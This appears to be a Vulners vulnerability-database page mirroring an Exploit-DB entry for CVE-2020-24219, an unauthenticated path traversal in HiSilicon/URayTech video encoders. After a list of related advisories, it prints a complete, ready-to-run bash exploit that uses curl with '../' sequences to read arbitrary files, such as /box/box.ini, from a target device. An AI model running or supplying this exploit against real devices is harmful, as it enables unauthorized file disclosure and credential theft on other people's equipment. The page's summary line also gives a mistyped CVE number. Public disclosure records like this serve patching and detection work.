Lucene search
K

HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal

🗓️ 19 Oct 2020 00:00:00Reported by Alexei KojenovType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 305 Views

HiSilicon Video Encoders Unauthenticated File Disclosure via Path Traversal. Date: 2020-09-20, Version: up to 1.97, CVE: CVE-2020-2421

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-24219
21 Feb 202512:27
circl
Check Point Advisories
Arbitrary Command Injection Over HTTP Traffic (CVE-2020-19165; CVE-2020-24219; CVE-2020-28477; CVE-2021-26747; CVE-2021-27328)
24 Feb 202100:00
checkpoint_advisories
CVE
CVE-2020-24219
6 Oct 202013:16
cve
Cvelist
CVE-2020-24219
6 Oct 202013:16
cvelist
NVD
CVE-2020-24219
6 Oct 202014:15
nvd
OpenVAS
HiSilicon Encoder Directory Traversal Vulnerability - Active Check
24 Sep 202000:00
openvas
OSV
CVE-2020-24219
6 Oct 202014:15
osv
Packet Storm
HiSilicon Video Encoder 1.97 File Disclosure / Path Traversal
19 Oct 202000:00
packetstorm
Prion
Path traversal
6 Oct 202014:15
prion
CERT
IPTV encoder devices contain multiple vulnerabilities
15 Sep 202000:00
cert
Rows per page
#!/usr/bin/env bash

# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: https://www.szuray.com/
# Software Link: N/A
# Version: up to 1.97
# Tested on: Linux
# CVE: CVE-2020-24219
# Vendors: URayTech
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979


if [ "$#" -ne 2 ]
then
  echo "Usage:   $0 <server>[:<port>] <filepath>"
  echo "Example: $0 1.2.3.4:8086 /box/box.ini"
  exit 1
fi

curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \
  || echo "ERROR: curl returned $?"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation